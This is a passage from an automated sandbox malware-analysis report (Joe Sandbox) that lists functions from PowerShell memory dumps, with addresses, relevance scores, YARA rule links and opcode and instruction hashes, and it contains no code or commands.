                                                                                                                  • Opcode Fuzzy Hash: 0dce9a6340ce207246aad802030390f1a678d99f7a45e353a8751e5f457bc81a
                                                                                                                  • Instruction Fuzzy Hash: 9001677111CB0C8FD744EF0CE451AA5B7E0FB99364F10056EE58AC3695D736E881CB45
                                                                                                                  Function 00007FF8491F1E1D Relevance: .0, Instructions: 40COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2192353422.00007FF8491F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff8491f0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b636e50e461a44c95bc3c10f4ae8cf17a054ea153956b97362c0880f0c56683d
                                                                                                                  • Instruction ID: 2dddb2579fdd5baefae89e8e63149073861f51fbcc98d3c2958a3e4078aaa8ee
                                                                                                                  • Opcode Fuzzy Hash: b636e50e461a44c95bc3c10f4ae8cf17a054ea153956b97362c0880f0c56683d
                                                                                                                  • Instruction Fuzzy Hash: 12F0F032A0C5898FDB65EB0CE4418A873E0FF45360B0800B6E04CC7067DB2AAC118B50
                                                                                                                  Function 00007FF848F37968 Relevance: .0, Instructions: 39COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2188766524.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6e2de2f32daf0fd5ab6cb6fad72adb765b76f53c4a94bf305dc6ac16ff9e7b8b
                                                                                                                  • Instruction ID: d585b9aaee269bf394b29a725a25fcc94961d7054997b2808aaf2addfbac68e2
                                                                                                                  • Opcode Fuzzy Hash: 6e2de2f32daf0fd5ab6cb6fad72adb765b76f53c4a94bf305dc6ac16ff9e7b8b
                                                                                                                  • Instruction Fuzzy Hash: EEF0373275D6048FDB4CAA1CF4429B573D1E795324F10017EE48BC2696E917E8428685
                                                                                                                  Function 00007FF8491F20CB Relevance: .0, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2192353422.00007FF8491F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff8491f0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c0b92b78d677c3a35cf958d87be47518a352b5e016cc6ec4f1be002273851c78
                                                                                                                  • Instruction ID: 8ad2e65e1b1ed78da4dbb82daf28930003b66791cb215fb442048f1140876982
                                                                                                                  • Opcode Fuzzy Hash: c0b92b78d677c3a35cf958d87be47518a352b5e016cc6ec4f1be002273851c78
                                                                                                                  • Instruction Fuzzy Hash: 1EF0BE32A0D5898FEB64EF1CE4558A8B7E0FF05360B0504B6E15EC70A7DB2AEC40CB54
                                                                                                                  Function 00007FF8491F3FC4 Relevance: .0, Instructions: 35COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2192353422.00007FF8491F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff8491f0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b4ad103b0dffd686b9d1eabecc04bb2acb52c70621fb4bc016e488227f9f3224
                                                                                                                  • Instruction ID: 8bf0de622cf344d760f47ae825cfa4ad2491377da8663700c5284db9c4c293f5
                                                                                                                  • Opcode Fuzzy Hash: b4ad103b0dffd686b9d1eabecc04bb2acb52c70621fb4bc016e488227f9f3224
                                                                                                                  • Instruction Fuzzy Hash: 3FF0A03131CF044FE748EE2DE4497A2B3E0FBA8350F14462FE44AC3291DA21E8818782
                                                                                                                  Function 00007FF848F42770 Relevance: .0, Instructions: 35COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2188766524.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 04bd7268ad9e626f6a8e437e50892c00baf45aa65c3e2fdd2987d061a620a0b6
                                                                                                                  • Instruction ID: e628f5c3aff580f47e651600a10021a0e61cd3e73442c34ebcf697b8aed6c1e4
                                                                                                                  • Opcode Fuzzy Hash: 04bd7268ad9e626f6a8e437e50892c00baf45aa65c3e2fdd2987d061a620a0b6
                                                                                                                  • Instruction Fuzzy Hash: D8F0963180C6898FDB06EF6488195D5BFA0FF26351F1402EBD458C70A2DB759554CB82

                                                                                                                  Non-executed Functions

                                                                                                                  Function 00007FF848F3E1B2 Relevance: 10.2, Strings: 8, Instructions: 217COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2188766524.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: -I$0-I$8-I$X-I$aL_I$h-I$x-I$-I
                                                                                                                  • API String ID: 0-472530879
                                                                                                                  • Opcode ID: de752754e509c5f3500f65c3afb421d6a848034b5d42bc230f2d348b4dfdd29d
                                                                                                                  • Instruction ID: 91299e736cbbccfb21bdc44d90803d567f0467117d1e80e7889edf35f8565a8d
                                                                                                                  • Opcode Fuzzy Hash: de752754e509c5f3500f65c3afb421d6a848034b5d42bc230f2d348b4dfdd29d
                                                                                                                  • Instruction Fuzzy Hash: 2D51E573E0E9C24FF2E5A72C38191B57B80FFA2A60B5846FBC048D75DBE9159C064395